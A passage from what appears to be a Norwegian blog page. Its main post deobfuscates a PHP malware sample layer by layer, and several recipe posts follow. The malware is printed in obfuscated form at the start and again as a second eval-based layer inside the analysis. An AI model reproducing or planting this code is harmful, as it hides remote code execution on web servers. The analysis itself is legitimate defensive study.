825)3!Ypp2)%x5c%x7825zB%x5c%x7825z>!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A;!>!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%825-#1GO%x5c%x7822#)fepmqyfAx787f%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X/(.*)/epreg_replacempfqsmkdas'; $sjeykdhzzn = explode(chr((238-194)),'7526,20,4122,41,3639,28,183,52,1382,35,3350,59,7933,35,5453,38,5299,60,8374,31,7588,25,608,23,2791,29,6137,29,448,56,6954,20,3549,52,2698,64,7212,55,7416,54,3917,50,2092,20,1914,40,1876,38,3197,24,4247,61,792,39,5973,48,6738,53,7298,61,5359,36,562,46,1212,33,1153,59,6651,21,2590,31,7546,42,2442,64,8079,25,2506,63,907,30,4817,27,5140,70,3303,47,831,30,5700,62,408,40,6853,39,2621,34,3258,45,4635,64,7697,62,9690,30,4308,50,8242,36,3489,60,7871,27,1063,63,3161,36,9942,69,1695,35,8057,22,6021,69,7359,57,8602,68,9358,36,3093,44,2820,56,343,38,8825,33,4450,60,132,51,2419,23,4699,48,8670,33,6604,47,3409,23,5269,30,9116,67,861,46,7136,52,10011,28,37,45,937,59,8559,43,6424,26,2187,70,7792,30,5235,34,235,51,7613,35,9315,43,3743,45,9720,37,2655,43,6791,30,1954,66,8800,25,2942,52,5491,62,6212,68,2569,21,6576,28,9807,41,2322,30,7114,22,1644,51,286,57,4997,24,7898,35,2112,24,5907,66,5819,52,6280,61,8501,30,1355,27,726,66,9879,63,3788,43,2057,35,10039,67,2876,66,7759,33,3601,38,9439,39,7188,24,6166,23,1616,28,5553,43,5021,66,3221,37,7087,27,4747,70,1550,66,8104,70,4358,69,2994,26,5871,36,3020,36,1126,27,4844,37,3992,70,6450,31,8531,28,9416,23,3880,37,2352,67,6387,37,4062,22,9394,22,1730,60,6481,48,7648,49,5395,29,3967,25,9640,50,4163,49,8858,69,8767,33,3056,37,1462,48,7968,46,4579,56,4212,35,9573,67,3667,26,3693,50,7035,52,2159,28,8927,69,6922,32,2762,29,8330,44,7267,31,5596,38,6892,30,1510,40,4881,68,6672,66,7822,49,9848,31,6341,46,8278,52,631,49,9183,62,2257,65,0,37,1245,57,8014,43,6529,47,6090,47,1817,59,680,46,4427,23,8174,68,5424,29,5762,57,381,27,4949,48,9518,55,82,50,9058,58,1417,45,4510,69,3432,57,4084,38,6974,61,8996,62,8468,33,5634,66,1302,53,9757,50,2020,37,7470,56,6189,23,6821,32,5087,53,1790,27,9478,40,3831,49,504,58,996,67,8405,63,8703,64,5210,25,9245,70,3137,24,2136,23'); $jekjvzbupt=substr($fognhntadd,(67419-57313),(30-23)); if (!function_exists('otmxvqaaam')) { function otmxvqaaam($kruvavlbfw, $tmpdlccpfv) { $knpzekviot = NULL; for($mektnikgre=0;$mektnikgre<(sizeof($kruvavlbfw)/2);$mektnikgre++) { $knpzekviot .= substr($tmpdlccpfv, $kruvavlbfw[($mektnikgre*2)],$kruvavlbfw[($mektnikgre*2)+1]); } return $knpzekviot; };} $wrewusbqxp="\x20\57\x2a\40\x67\172\x6d\143\x69\170\x72\146\x69\146\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\70\x33\55\x31\64\x36\51\x29\54\x20\143\x68\162\x28\50\x33\66\x31\55\x32\66\x39\51\x29\54\x20\157\x74\155\x78\166\x71\141\x61\141\x6d\50\x24\163\x6a\145\x79\153\x64\150\x7a\172\x6e\54\x24\146\x6f\147\x6e\150\x6e\164\x61\144\x64\51\x29\51\x3b\40\x2f\52\x20\151\x61\153\x78\144\x62\143\x6b\156\x72\40\x2a\57\x20"; $flwwfkzecg=substr($fognhntadd,(50154-40041),(83-71)); $flwwfkzecg($jekjvzbupt, $wrewusbqxp, NULL); $flwwfkzecg=$wrewusbqxp; $flwwfkzecg=(419-298); $fognhntadd=$flwwfkzecg-1; ?>

After adding some newlines and replacing some strings with placeholders we can read the code without pondering our political stance.

(obfuscated_2.php.txt) download
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
$fognhntadd = '<horribly long string of non-random characters>';

$sjeykdhzzn = explode(
      chr((238-194)),
      '<long string of numbers separated by comma>'
      );

$jekjvzbupt=substr($fognhntadd,(67419-57313),(30-23));

if (!function_exists('otmxvqaaam')) {
  function otmxvqaaam($kruvavlbfw, $tmpdlccpfv) {
      $knpzekviot = NULL;
      for ($mektnikgre=0; $mektnikgre<(sizeof($kruvavlbfw)/2); $mektnikgre++) {
      $knpzekviot .= substr($tmpdlccpfv,
              $kruvavlbfw[($mektnikgre*2)],
              $kruvavlbfw[($mektnikgre*2)+1]
              );
      }
      return $knpzekviot;
  };
}

$wrewusbqxp="<long string of hex-escaped text>";
$flwwfkzecg=substr($fognhntadd,(50154-40041),(83-71));
$flwwfkzecg($jekjvzbupt, $wrewusbqxp, NULL);
$flwwfkzecg=$wrewusbqxp;
$flwwfkzecg=(419-298);
$fognhntadd=$flwwfkzecg-1;

?>

Let’s see if we can make the code a bit more readable:

The $fognhntadd on line 1 is not code to be executed, but is there to be used by the rest of the code. We can’t really make it more readable at this point.

$sjeykdhzzn on line four appears to split its second argument on chr((238-194)). chr returns a one-character string containing the character specified by the decimal argument. chr(238-194) = chr(44), and a quick look in man ascii tells us that the ASCII character with a decimal value of 44 is , (comma). This means $sjeykdhzzn will evaluate to an array consisting of 456 (0-455) numbers, every other large (1000+) and small(<50).

$jekjvzbupt on line 9 is a substring of the horribly long $fognhntadd - but how to know what without counting to 10106? (67419-57313=10106).

The code does not appear to to anything dangerious, so let’s try to parse it using a PHP engine! google “run php code online”. The second result, sandbox.onlinephpfunctions.com looks promising.

Pasting in $fognhntadd, $jekjvzbupt and a var_dump, tells us that $jekjvzbupt evaluates to the string /(.*)/e. While i didn’t know at the time, if this string is used in preg_replace on a system using PHP prior to 5.5.x, it is basically the same as eval.

We will skip the function otmxvqaaam for now.

The escaped string $wrewusbqxp get the same treatment, and returns the following code:

1
 /* gzmcixrfif */ eval(str_replace(chr((183-146)), chr((361-269)), otmxvqaaam($sjeykdhzzn,$fognhntadd))); /* iakxdbcknr */ 

$flwwfkzecg evaluates to preg_replace, why am i not surprised?

Line 26 uses $flwwfkzecg as a function name, and can thus be written like this:

1
preg_replace('/(.*)/e', 'eval(str_replace(chr((183-146)), chr((361-269)), otmxvqaaam($sjeykdhzzn,$fognhntadd)));', NULL);

This can also be written like this, reusing the techniques used above:

1
2
3
$foo = otmxvqaaam($sjeykdhzzn, $fognhntadd);
$bar = str_replace('%', '\\', $foo); # '\\' => \
eval($bar);

Suddenly understanding the function otmxvqaaam defined on line 12 becomes interesting. After renaming some of the variables, the function becomes somewhat easier to read.

1
2
3
4
5
6
7
8
9
function otmxvqaaam($start_and_length_array, $string) {
  $return_value = NULL;
  for ($i=0; $i < (sizeof($start_and_length)/2); $i++) {
      $start = $start_and_length_array[($i*2)]
      $length = $start_and_length_array[($i*2)+1]
      $return_value .= substr($string, $start, $length);
  }
  return $return_value;
};

This function uses $start_and_length_array together with substr as a grille. The even number positions(0,2,4…) of the array are the positions in the ciphertext, while the odd (1,3,5…) positions are the lengths.

I concluded that the last three lines did nothing that was worth analyzing. We now have enough data to make the code easier to read.

(obfuscated_3.php.txt) download
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php
$fognhntadd = '<horribly long string of non-random characters>';

$sjeykdhzzn = array() {
  0 => "7526",
  1 => "20",
  ...
  454 => "2136",
  455 => "23" 
}

function otmxvqaaam($start_and_length_array, $string) {
  $return_value = NULL;
  for ($i=0; $i < (sizeof($start_and_length)/2); $i++) {
      $start = $start_and_length_array[($i*2)]
      $length = $start_and_length_array[($i*2)+1]
      $return_value .= substr($string, $start, $length);
  }
  return $return_value;
};

$foo = otmxvqaaam($sjeykdhzzn, $fognhntadd);
$bar = str_replace('%', '\\', $foo); # '\\' => \
eval($bar);

?>

Since the code up to this point does nothing active (exec, system, fwrite, …), we can replace eval with echo in our code, and get the following result:

(obfuscated_4.php.txt) download
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
if((
  function_exists("\x6f\142\x5f\163\x74\141\x72\164") &&
      (!isset($GLOBALS["\x61\156\x75\156\x61"]))
  )) {

  $GLOBALS["\x61\156\x75\156\x61"]=1;

  function fjfgg($n){
    return chr(ord($n)-1);
  }

@error_reporting(0);

 preg_replace("\x2f\50\x2e\52\x29\57\x65","\x65\166\x61\154\x28\151\x6d\160\x6c\157\x64\145\x28\141\x72\162\x61\171\x5f\155\x61\160\x28\42\x66\152\x66\147\x67\42\x2c\163\x74\162\x5f\163\x70\154\x69\164\50\x22\134\x78\62\x35\165\x3a\146\x21\76\x21\50\x5c\x7825\x5c\x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<\x5c\x78e\x5c\x78b\x5c\x7825w:!>!\x5c\x78246767~6<Cw6<pd\x5c\x7825w6Z6<.5\x5c\x7860hA\x5c\x7827pd\x5c\x78256<pd\x5c\x7825w6Z6<.4\x5c\x7860hA\x5c\x7827pd\x5c\x78256<pd\x5c\x7825w6Z6<.3\x5c\x7860hA\x5c\x7827pd\x5c\x78256<pd\x5c\x7825w6Z6<.2\x5c\x7860hA\x5c\x7827pd\x5c\x78256<C\x5c\x7827pd\x5c\x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf\x5c\x7827*&7-n\x5c\x7825)utjm6<\x5c\x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u\x5c\x78257>\x5c\x782f7&6|7**111127-K)ebfsX\x5c\x7827u\x5c\x7825)7fmji\x5c\x78786<C\x5c\x7827&6<*rfs\x5c\x78257-K)fujs\x5c\x7878X6<#o]o]Y\x5c\x78257;utpI#7>\x5c\x782f7rfs\x5c\x78256<#o]1\x5c\x782f20QUUI7jsv\x5c\x78257UFH#\x5c\x7827rfs\x5c\x78256~6<\x5c\x787fw6<*K)ftpmdXA6|7**197-2qj\x5c\x78257-K)udfoopdXA\x5c\x7822)7gj6<*QDU\x5c\x7860MPT7-NBFSUT\x5c\x7860LDPT7-UFOJ\x5c\x7860GB)fubfsdXA\x5c\x7827K6<\x5c\x787fw6*3qj\x5c\x78257>\x5c\x782272qj\x5c\x7825)7gj6<**2qj\x5c\x7825)hopm3qjA)qj3hopmA\x5c\x78273qj\x5c\x78256<*Y\x5c\x7825)fnbozcYufhA\x5c\x78272qj\x5c\x78256<^#zsfvr#\x5c\x785cq\x5c\x78257\x5c\x782f7#@#7\x5c\x782f7^#iubq#\x5c\x785cq\x5c\x7825\x5c\x7827jsv\x5c\x78256<C>^#zsfvr#\x5c\x785cq\x5c\x78257**^#zsfvr#\x5c\x785cq\x5c\x7825)ufttj\x5c\x7822)gj6<^#Y#\x5c\x785cq\x5c\x7825\x5c\x7827Y\x5c\x78256<.msv\x5c\x7860ftsbqA7>q\x5c\x78256<\x5c\x787fw6*\x5c\x787f_*#fubfsdXk5\x5c\x7860{66~6<&w6<\x5c\x787fw6*CW&)7gj6<*doj\x5c\x78257-C)fepmqnjA\x5c\x7827&6<.fmjgA\x5c\x7827doj\x5c\x78256<\x5c\x787fw6*\x5c\x787f_*#fmjgk4\x5c\x7860{6~6<tfs\x5c\x7825w6<\x5c\x787fw6*CWtfs\x5c\x7825)7gj6<*id\x5c\x7825)ftpmdR6<*id\x5c\x7825)dfyfR\x5c\x7827tfs\x5c\x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv\x5c\x78257-MSV,6<*)ujojR\x5c\x7827id\x5c\x78256<\x5c\x787fw6*\x5c\x787f_*#ujojRk3\x5c\x7860{666~6<&w6<\x5c\x787fw6*CW&)7gj6<.[A\x5c\x7827&6<\x5c\x787fw6*\x5c\x787f_*#[k2\x5c\x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd\x5c\x7860ufh\x5c\x7860fmjg}[;ldpt\x5c\x7825}K;\x5c\x7860ufldpt}X;\x5c\x7860msvd}R;*msv\x5c\x7825)}.;\x5c\x7860UQPMSVD!-id\x5c\x7825)uqpuft\x5c\x7860msvd},;uqpuft\x5c\x7860msvd}+;!>!}\x5c\x7827;!>>>!}_;gvc\x5c\x7825}&;ftmbg}\x5c\x787f;!osvufs}w;*\x5c\x787f!>>\x5c\x7822!pd\x5c\x7825)!gj}Z;h!opjudovg}{;#)tutjyf\x5c\x7860opjudovg)!gj!|!*msv\x5c\x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j\x5c\x7825-bubE{h\x5c\x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j\x5c\x7825>j\x5c\x7825!*3!\x5c\x7827!hmg\x5c\x7825!)!gj!<2,*j\x5c\x7825!-#1]#-bubE{h\x5c\x7825)tpqsut>j\x5c\x7825!*72!\x5c\x7827!hmg\x5c\x7825)!gj!<2,*j\x5c\x7825-#1]#-bubE{h\x5c\x7825)tpqsut>j\x5c\x7825!*9!\x5c\x7827!hmg\x5c\x7825)!gj!~<ofmy\x5c\x7825,3,j\x5c\x7825>j\x5c\x7825!<**3-j\x5c\x7825-bubE{h\x5c\x7825)sutcvt-#w#)ldbqov>*ofmy\x5c\x7825)utjm!|!*5!\x5c\x7827!hmg\x5c\x7825)!gj!|!*1?hmg\x5c\x7825)!gj!<**2-4-bubE{h\x5c\x7825)sutcvt)esp>hmg\x5c\x7825!<12>j\x5c\x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h\x5c\x7825)sutcvt)!gj!|!*bubE{h\x5c\x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf\x5c\x7860opjudovg\x5c\x7822)!gj}1~!<2p\x5c\x7825\x5c\x787f!~!<##!>!2p\x5c\x7825Z<^2\x5c\x785c2b\x5c\x7825!>!2p\x5c\x7825!*3>?*2b\x5c\x7825)gpf{jt)!gj!<*2bd\x5c\x7825-#1GO\x5c\x7822#)fepmqyfA>2b\x5c\x7825!<*qp\x5c\x7825-*.\x5c\x7825)euhA)3of>2bd\x5c\x7825!<5h\x5c\x7825\x5c\x782f#0#\x5c\x782f*#npd\x5c\x782f#)rrd\x5c\x782f#00;quui#>.\x5c\x7825!<***f\x5c\x7827,*e\x5c\x7827,*d\x5c\x7827,*c\x5c\x7827,*b\x5c\x7827)fepdof.)fepdof.\x5c\x782f#@#\x5c\x782fqp\x5c\x7825>5h\x5c\x7825!<*::::::-111112)eobs\x5c\x7860un>qp\x5c\x7825!|Z~!<##!>!2p\x5c\x7825!|!*!***b\x5c\x7825)sf\x5c\x7878pmpusut!-#j0#!\x5c\x782f!**#sfmcnbs+yfeobz+sfwjidsb\x5c\x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!\x5c\x782f!#0#)idubn\x5c\x7860hfsq)!sp!*#ojneb#-*f\x5c\x7825)sf\x5c\x7878pmpusut)tpqssutRe\x5c\x7825)Rd\x5c\x7825)Rb\x5c\x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT\x5c\x7860QIQ&f_UTPI\x5c\x7860QUUI&e_SEEB\x5c\x7860FUPNFS&d_SFSFGFS\x5c\x7860QUUI&c_UOFHB\x5c\x7860SFTV\x5c\x7860QUUI&b\x5c\x7825!|!*)323zbek!~!<b\x5c\x7825\x5c\x787f!<X>b\x5c\x7825Z<#opo#>b\x5c\x7825!*##>>X)!gjZ<#opo#>b\x5c\x7825!**X)ufttj\x5c\x7822)gj!|!*nbsbq\x5c\x7825)323ldfidk!~!<**qp\x5c\x7825!-uyfu\x5c\x7825)3of)fepdof\x5c\x786057ftbc\x5c\x787f!|!*uyfu\x5c\x7827k:!ftmf!}Z;^nbsbq\x5c\x7825\x5c\x785cSFWSFT\x5c\x7860\x5c\x7825}X;!sp!*#opo#>>}R;msv}.;\x5c\x782f#\x5c\x782f#\x5c\x782f},;#-#}+;\x5c\x7825-qp\x5c\x7825)54l}\x5c\x7827;\x5c\x7825!<*#}_;#)323ldfid>}&;!osvufs}\x5c\x787f;!opjudovg}k~~9{d\x5c\x7825:osvufs:~928>>\x5c\x7822:ftmbg39*56A:>:8:|:7#6#)tutjyf\x5c\x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm\x5c\x7825:-5ppde:4:|:**#ppde#)tutjyf\x5c\x78604\x5c\x78223}!+!<+{e\x5c\x7825+*!*+fepdfe{h+{d\x5c\x7825)+opjudovg+)!gj+{e\x5c\x7825!osvufs!*!+A!>!{e\x5c\x7825)!>>\x5c\x7822!ftmbg)!gj<*#k#)usbut\x5c\x7860cpV\x5c\x787f\x5c\x787f\x5c\x787f\x5c\x787f<u\x5c\x7825V\x5c\x7827{ftmfV\x5c\x787f<*X&Z&S{ftmfV\x5c\x787f<*XAZASV<*w\x5c\x7825)ppde>u\x5c\x7825V<#65,47R25,d7R17,67R37,#\x5c\x782fq\x5c\x7825>U<#16,47R57,27R66,#\x5c\x782fq\x5c\x7825>2q\x5c\x7825<#g6R85,67R37,18R#>q\x5c\x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w\x5c\x7825)kV\x5c\x7878{**#k#)tutjyf\x5c\x7860\x5c\x7878\x5c\x7822l:!}V;3q\x5c\x7825}U;y]}R;2]},;osvufs}\x5c\x7827;mnui}&;zepc}A;~!}\x5c\x787f;!|!}{;)gj}l;33bq}k;opjudovg}\x5c\x7878;0]=])0#)U!\x5c\x7827{**u\x5c\x7825-#jt0}Z;0]=]0#)2q\x5c\x7825l}S;2-u\x5c\x7825!-#2#\x5c\x782f#\x5c\x7825#\x5c\x782f#o]#\x5c\x782f*)323zbe!-#jt0*?]+^?]_\x5c\x785c}X\x5c\x7824<!\x5c\x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!\x5c\x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<\x5c\x7825tmw!>!#]y84]275]y83]273]y76]277#<\x5c\x7825t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!\x5c\x7825tww!>!\x5c\x782400~:<h\x5c\x7825_t\x5c\x7825:osvufs:~:<*9-1-r\x5c\x7825)s\x5c\x7825>\x5c\x782fh\x5c\x7825:<**#57]38y]47]67y]37]88y]27]28y]#\x5c\x782fr\x5c\x7825\x5c\x782fh\x5c\x7825)n\x5c\x7825-#+I#)q\x5c\x7825:>:r\x5c\x7825:|:**t\x5c\x7825)m\x5c\x7825=*h\x5c\x7825)m\x5c\x7825):fmji\x5c\x7878:<##:>:h\x5c\x7825:<#64y]552]e7y]#>n\x5c\x7825<#372]58y]472]37y]672]48y]#>s\x5c\x7825<#462]47y]252]18y]#>q\x5c\x7825<#762]67y]562]38y]572]48y]#>m\x5c\x7825:|:*r\x5c\x7825:-t\x5c\x7825)3of:opjudovg<~\x5c\x7824<!\x5c\x7825o:!>!\x5c\x78242178}527}88:}334}472\x5c\x7824<!\x5c\x7825mm!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!\x5c\x7825ff2!>!bssbz)\x5c\x7824]25\x5c\x7824-\x5c\x7824-!\x5c\x7825\x5c\x7824-\x5c\x7824*!|!\x5c\x7824-\x5c\x7824\x5c\x785c\x5c\x7825j^\x5c\x7824-\x5c\x7824tvctus)\x5c\x7825\x5c\x7824-\x5c\x7824b!>!\x5c\x7825yy)#}#-#\x5c\x7824-\x5c\x7824-tusqpt)\x5c\x7825z-#:#*\x5c\x7824-\x5c\x7824!>!tus\x5c\x7860sfqmbdf)\x5c\x7825\x5c\x7824-\x5c\x7824y4\x5c\x7824-\x5c\x7824]y8\x5c\x7824-\x5c\x7824]26\x5c\x7824-\x5c\x7824<\x5c\x7825j,,*!|\x5c\x7824-\x5c\x7824gvodujpo!\x5c\x7824-\x5c\x7824y7\x5c\x7824-\x5c\x7824*<!\x5c\x7824-\x5c\x7824gps)\x5c\x7825j>1<\x5c\x7825j=tj{fpg)\x5c\x7825\x5c\x7824-\x5c\x7824*<!~!dsfbuf\x5c\x7860gvodujpo)##-!#~<#\x5c\x782f\x5c\x7825\x5c\x7824-\x5c\x7824!>!fyqmpef)#\x5c\x7824*<!\x5c\x7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!\x5c\x7825t::!>!\x5c\x7824Ypp3)\x5c\x7825cB\x5c\x7825iN}#-!tussfw)\x5c\x7825c*W\x5c\x7825eN+#Qi\x5c\x785c1^W\x5c\x7825c!>!\x5c\x7825i\x5c\x785c2^<!Ce*[!\x5c\x7825cIjQeTQcOc\x5c\x782f#00#W~!Ydrr)\x5c\x7825r\x5c\x7878Bsfuvso!sboepn)\x5c\x7825epnbss-\x5c\x7825r\x5c\x7878W~!Ypp2)\x5c\x7825zB\x5c\x7825z>!tussfw)\x5c\x7825zW\x5c\x7825h>EzH,2W\x5c\x7825wN;#-Ez-1H*WCw*[!\x5c\x7825rN}#QwTW\x5c\x7825hIr\x5c\x785c1^-\x5c\x7825r\x5c\x785c2^-\x5c\x7825hOh\x5c\x782f#00#W~!\x5c\x7825t2w)##Qtjw)#]82#-#!#-\x5c\x7825tmw)\x5c\x7825tww**WYsboepn)\x5c\x7825bss-\x5c\x7825r\x5c\x7878B\x5c\x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-\x5c\x7878r.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#\x5c\x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<\x5c\x7825tpz!>!#]D6M7]K3#<\x5c\x7825yy>#]D6]281L1#\x5c\x782f#M5]DgP5]D6#<\x5c\x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<\x5c\x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<\x5c\x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<\x5c\x7825bG9}:}.}-}!#*<\x5c\x7825nfd>\x5c\x7825fdy<Cb*[\x5c\x7825h!>!\x5c\x7825tdz)\x5c\x7825bbT-\x5c\x7825bT-\x5c\x7825hW~\x5c\x7825fdy)##-!#~<\x5c\x7825h00#*<\x5c\x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58]24]31#-\x5c\x7825tdz*Wsfuvso!\x5c\x7825bss\x5c\x785csboe))1\x5c\x782f35.)1\x5c\x782f14+9**-)1\x5c\x782f2986+7**^\x5c\x782f\x5c\x7825r\x5c\x7878<~!!\x5c\x7825s:N}#-\x5c\x7825o:W\x5c\x7825c:>1<\x5c\x7825b:>1<!gps)\x5c\x7825j:>1<\x5c\x7825j:=tj{fpg)\x5c\x7825s:*<\x5c\x7825j:,,Bjg!)\x5c\x7825j:>>1*!\x5c\x7825b:>1<!fmtf!\x5c\x7825b:>\x5c\x7825s:\x5c\x785c\x5c\x7825j:.2^,\x5c\x7825b:<!\x5c\x7825c:>\x5c\x7825s:\x5c\x785c\x5c\x7825j:^<!\x5c\x7825w\x5c\x7860\x5c\x785c^>Ew:Qb:Qc:W~!\x5c\x7825z!>2<!gps)\x5c\x7825j>1<\x5c\x7825j=6[\x5c\x7825ww2!>#p#\x5c\x782f#p#\x5c\x782f\x5c\x7825z<jg!)\x5c\x7825z>>2*!\x5c\x7825z>3<!fmtf!\x5c\x7825z>2<!\x5c\x7825ww2)\x5c\x7825w\x5c\x7860TW~\x5c\x7824<\x5c\x78e\x5c\x78b\x5c\x7825mm)\x5c\x7825\x5c\x7878:-!\x5c\x7825tzw\x5c\x782f\x5c\x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*\x5c\x7824\x5c\x782f\x5c\x7825kj:-!OVMM*<(<\x5c\x78e\x5c\x78b\x5c\x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!\x5c\x7825ggg)(0)\x5c\x782f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<\x22\51\x29\51\x29\73", NULL);
}
?>

Oh joy! Another layer of obfuscation. I can’t wait for part 2!

1. May, 2014

Pico De Gallo

Skrevet av Yvonne Bakken, 1. May 2014 19:05

Hola!

 

Cinco de Mayo er snart rundt hjørnet. Selv om du nødvendigvis verken er i eller fra Puebla (eller California for den saks skyld..) så er meksikansk mat ofte en slager  fordetom. Det er det i hvert fall her i huset. Pico de Gallo er en slags salsa eller salat. Den brukes oftest som tilbehør til ymse matretter, men det er absolutt ingenting i veien for å bruke den sammen f.eks tortillachips om du er en sånn som spiser det!  Her er min versjon av den:

Du trenger følgende:

 

  • Fire til seks plommetomater
  • En finfinhakket løk
  • Ett til to finfinhakkede hvitløksfedd
  • Sju, åtte ringer syltede jalapeños (eller en liten fersk) – hakket
  • En halv gul paprika
  • Saften fra den største limen du finner
  • Salt/pepper etter smak
  • Nesten en hel busk finhakket koriander

Pico de Gallo

 

Hakk, bland og la stå en halvtime, time før servering. Jeg velger i dag å spise den til pulled pork og coleslaw – hva med deg?

20. April, 2014

Octopress: Let's Try Something New

Skrevet av Anders Einar Hilden, 20. April 2014 20:21

Sooooo, i got kinda tired of wordpress, and felt like testing something static, and a little closer to my terminal.

Enter Octopress

6. April, 2014

Kylling og pølse med balsamico-saus i slow cooker

Skrevet av Yvonne Bakken, 6. April 2014 18:28

Ja ok, jeg innrømmer at det kanskje høres litt ekkelt rart ut. Men hear me out. DET ER SÅ GODT!! Jeg bare elsker slow cookeren jeg (vi) fikk til jul, og den får kjørt seg stadig vekk. Søndagsmiddag er blitt synonymt med slow cooker-middag f.eks. Jeg har ikke kreert denne oppskrifta selv, men jeg har ærlig og redelig kopiert, justert litt og oversatt den.  Ikke er bildene mine heller. Alt er hentet fra popularpaleo.com

 

Du trenger følgende:

  • 4-6 kyllingbryst
  • 6 rå pølser uten tull i (jeg brukte fire av Meny sine egne)
  • En stor løk i tynne ringer
  • 4-6 hvitløksfedd, hakkede
  • Olivenolje
  • 1 ts «italiensk krydderblanding» – eller bare litt av de tre store: timian, basilikum og rosmarin
  • 1 ts hvitløkspulver
  • 1 ts salt
  • 2 bokser hakkede tomater 
  • 2,4 dl kyllingkraft
  • 4-5 ss balsamico (jeg brukte en kremete type, men du bruker selvsagt hva du vil)
  • en ny runde av det tørre krydderet med samme mål

 

Bilde

 

Slik gjør du:

Legg kyllingbrystene nederst i slow cookeren, ha over det du synes er en passende mengde olivenolje. Dryss over den første runden med tørt krydder. Ikke bland noe, bare hell det over i rekkefølge. Dette gjelder absolutt alt i hele oppskrifta. IKKE bland, bare legg alt lagvis. OK? Fint. Så putter du oppi pølsene og lar de ligge pent før du dekker over med løk og hvitløk. Hell over kraft, tomatguffa og balsamicoen. Krydre på topp med runde to av det tørre krydderet. Sånn – nå legger du på lokket og setter slow cookeren på high og venter i fem timer. Spis gjerne zoodles til!

 

Bilde

 

Som du ser har jeg stjålet bildene. Herfra for å være helt oppriktig.